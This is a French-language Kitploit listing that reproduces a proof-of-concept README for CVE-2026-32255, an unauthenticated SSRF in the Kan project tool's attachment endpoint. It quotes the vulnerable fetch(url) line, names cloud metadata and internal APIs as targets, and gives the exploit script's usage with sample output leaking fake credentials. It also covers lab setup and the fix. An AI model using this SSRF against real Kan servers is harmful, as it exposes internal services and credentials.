Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
poc-cve-2026-32255 — Ce dépôt contient une preuve de concept (POC) pour CVE-2026-32255, une vulnérabilité de falsification de requête côté serveur (SSRF) de gravité élevée dans Kan, un outil open-source de gestion de projet. | Kitploit
Outils/GitHubGitHub/koadt/poc-cve-2026-32255
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubkoadt/poc-cve-2026-32255

poc-cve-2026-32255

Ce dépôt contient une preuve de concept (POC) pour CVE-2026-32255, une vulnérabilité de falsification de requête côté serveur (SSRF) de gravité élevée dans Kan, un outil open-source de gestion de projet.

Voir le dépôt
2il y a 5 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SSRF via Téléchargement de Pièce Jointe dans Kan (CVE-2026-32255) - Preuve de Concept

Ce dépôt contient une preuve de concept (POC) pour la CVE-2026-32255, une vulnérabilité de Server-Side Request Forgery (SSRF) de sévérité élevée dans Kan, un outil open-source de gestion de projet.

Le point de terminaison vulnérable permet à des attaquants non authentifiés d'effectuer des requêtes HTTP arbitraires depuis le serveur et de lire la réponse complète, permettant ainsi l'accès aux services internes et aux points de terminaison de métadonnées cloud.

Table des matières

  1. Détails de la vulnérabilité
  2. Exécution de la POC
  3. Utilisation du script d'exploitation
  4. Comment corriger la vulnérabilité
  5. Avertissement

Détails de la vulnérabilité

Informations sur la CVE

  • Identifiant CVE : CVE-2026-32255
  • Versions affectées : Kan <= 0.5.4
  • : 0.5.5
Version corrigée
  • Score CVSS : 8.6 (Élevé)
  • Vecteur CVSS : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  • CWE : CWE-918 (Server-Side Request Forgery)
  • Description

    Le fichier apps/web/src/pages/api/download/attatchment.ts expose un point de terminaison GET /api/download/attatchment destiné à servir de proxy pour les téléchargements de pièces jointes depuis le stockage S3. Le point de terminaison accepte un paramètre de requête url contrôlé par l'utilisateur et le transmet directement à fetch() côté serveur sans aucune validation ni authentification :

    root@kitploit:~
    const upstream = await fetch(url); // aucune validation sur `url`
    

    Un attaquant peut fournir n'importe quelle URL, ce qui amène le serveur à effectuer une requête HTTP vers cette destination et à renvoyer le corps de la réponse complet au client. Il s'agit d'une SSRF avec lecture complète (non aveugle), ce qui signifie que l'attaquant peut lire l'intégralité du contenu de la réponse.

    Impact

    • Accès aux services internes non exposés sur Internet
    • Lecture des points de terminaison de métadonnées cloud (par exemple, http://169.254.169.254/ sur AWS/GCP)
    • Scan de ports des réseaux internes
    • Exfiltration de données sensibles depuis des API internes

    Références

    • NVD - CVE-2026-32255
    • Avis de sécurité GitHub - GHSA-qrx8-9hc6-jvqg
    • Commit de correction

    Exécution de la POC

    Prérequis

    • Docker et Docker Compose
    • Bash
    • curl

    Étape 1 : Exécuter une instance vulnérable de Kan

    Cloner et exécuter Kan v0.5.4 (la dernière version vulnérable) :

    root@kitploit:~
    git clone --branch v0.5.4 https://github.com/kanbn/kan.git
    cd kan
    

    Configurer les variables d'environnement requises :

    root@kitploit:~
    cat > .env <<'EOF'
    NEXT_PUBLIC_BASE_URL=http://localhost:3000
    BETTER_AUTH_SECRET=poc-secret-not-for-production-use
    POSTGRES_URL=postgresql://kan:kan@localhost:5432/kan_db
    POSTGRES_PASSWORD=kan
    REDIS_URL=redis://localhost:6379
    NEXT_PUBLIC_STORAGE_URL=http://localhost:9000
    EOF
    

    Remarque : Si vous obtenez une erreur concernant dokploy-network, supprimez les références à dokploy-network dans docker-compose.yml (lignes 9, 130-131) puis exécutez à nouveau docker compose up -d. Ce réseau n'est pas nécessaire en local.

    Démarrer les conteneurs :

    root@kitploit:~
    docker compose up -d
    

    L'application devrait être disponible à l'adresse http://localhost:3000.

    Étape 2 : Démarrer le service interne simulé

    Dans un terminal séparé, démarrer le service interne simulé inclus qui reproduit une API interne sensible :

    root@kitploit:~
    python3 internal-service.py
    

    Cela démarre un serveur sur le port 8888 qui renvoie de faux identifiants, simulant un service qui ne devrait être accessible que depuis le réseau interne. Dans un scénario réel, ce service serait isolé derrière un pare-feu et inaccessible depuis l'extérieur. La SSRF permet à l'attaquant de l'atteindre via le serveur.

    Étape 3 : Exécuter l'exploit

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh http://localhost:3000
    

    Utilisation du script d'exploitation

    Utilisation

    root@kitploit:~
    ./exploit.sh <url-cible> [url-interne]
    
    • <url-cible> : URL de base de l'instance Kan (par exemple, http://localhost:3000)
    • [url-interne] : URL interne à récupérer via la SSRF (facultatif, auto-détectée à partir de la passerelle du pont Docker)

    Exemple

    root@kitploit:~
    ./exploit.sh http://localhost:3000
    
    root@kitploit:~
    === CVE-2026-32255 - SSRF via Téléchargement de Pièce Jointe dans Kan ===
    Cible : http://localhost:3000
    URL interne : http://172.17.0.1:8888
    
    [*] Vérification de l'accessibilité du point de terminaison...
    [+] Le point de terminaison est accessible (HTTP 400)
    
    [*] Tentative de SSRF vers http://172.17.0.1:8888 ...
    [+] VULNÉRABLE - Le serveur a récupéré la ressource interne
    
    Contenu divulgué :
    ------------------------------------------------------------
    {
      "service": "internal-config-api",
      "credentials": {
        "db_host": "10.0.0.5",
        "db_user": "admin",
        "db_password": "s3cret_passw0rd!",
        "api_key": "sk-internal-4f8a2b1c9d3e7f6a5b0c8d2e1f4a7b3c"
      }
    }
    ------------------------------------------------------------
    

    Comment corriger la vulnérabilité

    Mettre à jour Kan (recommandé)

    Mettre à jour vers Kan v0.5.5 ou une version ultérieure, qui valide le paramètre url par rapport au nom d'hôte du point de terminaison S3 configuré avant de servir de proxy à la requête.

    Solution de contournement : Bloquer au niveau du proxy inverse

    Si vous ne pouvez pas mettre à jour immédiatement, bloquez l'accès externe au point de terminaison vulnérable au niveau de votre proxy inverse.


    Avertissement

    Cette preuve de concept est fournie uniquement à des fins éducatives et pour des tests de sécurité autorisés. N'utilisez cet outil que sur des systèmes dont vous êtes propriétaire ou pour lesquels vous disposez d'une autorisation écrite explicite de test.

    L'auteur n'est pas responsable de toute utilisation abusive des informations ou des outils fournis dans ce dépôt. L'accès non autorisé à des systèmes informatiques est illégal.


    Découvert par : kOaDT ([email protected])

    Télécharger l’outil